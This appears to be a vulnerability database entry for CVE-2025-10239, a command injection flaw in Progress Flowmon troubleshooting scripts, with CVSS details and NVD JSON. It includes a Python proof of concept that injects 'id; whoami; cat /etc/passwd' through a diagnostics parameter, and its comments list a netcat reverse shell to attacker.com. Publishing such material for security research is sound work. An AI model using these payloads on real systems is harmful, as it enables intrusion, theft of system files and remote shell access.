Security Vulnerability Report
中文
CVE-2025-10239 CVSS 7.2 HIGH

CVE-2025-10239

Published: 2025-10-09 13:15:32
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

In Flowmon versions prior to 12.5.5, a vulnerability has been identified that allows a user with administrator privileges and access to the management interface to execute additional unintended commands within scripts intended for troubleshooting purposes.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Progress Flowmon < 12.5.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-10239 - Flowmon Command Injection PoC # Vulnerability: Command Injection in troubleshooting scripts # Affected: Flowmon versions prior to 12.5.5 # Required: Administrator privileges on Flowmon management interface import requests import sys # Target configuration TARGET_URL = "https://target-flowmon.example.com" USERNAME = "admin" PASSWORD = "password123" # Step 1: Authenticate to Flowmon management interface session = requests.Session() login_url = f"{TARGET_URL}/api/auth/login" login_payload = { "username": USERNAME, "password": PASSWORD } response = session.post(login_url, json=login_payload, verify=False) if response.status_code != 200: print("[!] Authentication failed") sys.exit(1) print("[*] Authenticated successfully") # Step 2: Inject command via troubleshooting script parameter # The vulnerability exists in script parameters that are passed # to OS shell without proper sanitization troubleshoot_url = f"{TARGET_URL}/api/diagnostics/execute" # Malicious payload: inject OS command via semicolon separator # Normal input would be a hostname like "target.example.com" # Injected input appends additional command after semicolon injected_payload = { "script": "traceroute", "target": "127.0.0.1; id; whoami; cat /etc/passwd" } response = session.post(troubleshoot_url, json=injected_payload, verify=False) print(f"[*] Response status: {response.status_code}") print(f"[*] Response body: {response.text}") # Alternative injection vectors to test: # target = "127.0.0.1 && cat /etc/passwd" # target = "127.0.0.1 | nc attacker.com 4444 -e /bin/sh" # target = "127.0.0.1`whoami`" # target = "$(cat /etc/passwd)" print("[*] Command injection attempt completed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10239", "sourceIdentifier": "[email protected]", "published": "2025-10-09T13:15:31.753", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Flowmon versions prior to 12.5.5, a vulnerability has been identified that allows a user with administrator privileges and access to the management interface to execute additional unintended commands within scripts intended for troubleshooting purposes."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://community.progress.com/s/article/CVE-2025-10239", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.